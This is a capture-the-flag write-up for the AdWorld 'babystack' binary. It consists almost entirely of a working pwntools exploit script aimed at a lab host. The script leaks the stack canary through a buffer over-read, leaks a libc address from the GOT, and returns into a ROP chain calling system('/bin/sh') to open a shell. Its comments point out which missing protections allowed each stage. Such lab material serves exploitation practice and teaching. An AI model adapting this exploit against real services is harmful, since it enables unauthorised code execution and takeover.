
adworld-babystack

泄露canary+泄露libc+rop

from pwn import *

# Walkthrough of the AdWorld "babystack" practice binary (lab host below).
# The script runs three stages: read the stack canary back out of the process,
# read a libc address out of the GOT, then return into a ROP chain. Each stage
# depends on a protection that is absent or bypassable here; the defender's
# view (what would have stopped the step) is noted inline.
context(arch='amd64', os='linux',log_level='debug')  # debug: every byte sent/received is logged
context.terminal = ['tmux','splitw','-h']
#cn = process(["/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/ld-2.23.so","./babystack"],env={"LD_PRELOAD":"/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc6_2.23-0ubuntu11.2_amd64.so"})
cn = remote('10.10.31.156',10006)
elf = ELF('./babystack')
# The libc build must be the one the target actually runs; every offset below
# (read, system, "/bin/sh") is taken from this file, so a mismatch breaks stage 3.
libc = ELF('/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc6_2.23-0ubuntu11.2_amd64.so')
read_got=elf.got['read']   # GOT slot whose resolved value is printed in stage 2
puts_addr=elf.plt['puts']  # PLT stub that does the printing
# Hard-coded code addresses: only possible because the binary is not
# position-independent. PIE would have made these (and pop_rdi) unknown.
main=0x400908
#ROPgadget --binary babystack --only "pop|ret" |grep rdi
pop_rdi=0x400a93  # loads the first-argument register before a call
########################
# Stage 1: recover the canary. Option 1 stores 0x88 bytes with no terminator;
# option 2 echoes the buffer back, and the echo runs past the buffer into the
# canary that follows it. A bounded, terminated copy would prevent the over-read.
cn.sendafter('>>','1')
#gdb.attach(cn,gdbscript='''b *0x4009d8''')
#gdb.attach(cn,gdbscript='''b *0x4009e9''')
#gdb.attach(cn,gdbscript='''b *0x4009f0''')#exit
cn.sendline('A'*0x88)
cn.sendafter('>>','2')
recv=cn.recvuntil('A'*0x88)
canary=cn.recv(8)
# The first of the 8 echoed bytes is discarded and a 0x00 is put back on the
# left, so after the little-endian unpack the canary's low byte is zero —
# the usual glibc layout (low byte null so string functions stop at it).
canary=u64(canary[1:].rjust(8,b'\x00'))
log.info("canary = %#x", canary)

# Stage 2: leak libc. The overflow writes the correct canary back in place
# (so the stack check passes), a filler word for the saved frame pointer, then
# pop_rdi / read@got / puts@plt / main: puts prints read()'s resolved address
# and the program restarts at main for another round.
cn.recvuntil('>> ')
payload = b'a'*0x88 + p64(canary) + p64(read_got) +p64(pop_rdi) + p64(read_got) + p64(puts_addr) + p64(main)
cn.sendline('1')
cn.send(payload)
cn.sendafter('>>','3')  # option 3 presumably returns from the vulnerable function, starting the chain — confirm
read_addr=cn.recvuntil(b'\x0a')
read_addr=read_addr[1:-1]  # drop one leading byte and the trailing newline (leading byte assumed to be echo noise — confirm)
print(read_addr)
read_addr=u64(read_addr.ljust(8,b'\x00'))  # pad the 6-byte address up to a full qword
log.info("read_addr = %#x", read_addr)
# libc base = leaked runtime address - the symbol's offset inside the libc file;
# system and the "/bin/sh" string are then rebased the same way.
read_offset= libc.symbols['read']
binsh=next(libc.search(b'/bin/sh'))
system=libc.symbols['system']
base=read_addr-read_offset
system_addr= base+system
binsh=binsh+base
# Stage 3: same overflow shape, now returning into system("/bin/sh").
# 0x40067e is an undocumented constant; it presumably is a plain `ret` used
# to keep the stack 16-byte aligned before entering system — confirm by
# disassembling the binary at that address.
cn.recvuntil('>> ')
cn.sendline('1')
payload=b'A'*0x88+p64(canary) + p64(binsh) + p64(0x40067e) + p64(pop_rdi) + p64(binsh) + p64(system_addr)
print(payload)
cn.send(payload)

cn.recvuntil('>> ')
cn.sendline('3')  # trigger the return again, this time into the stage-3 chain
cn.interactive()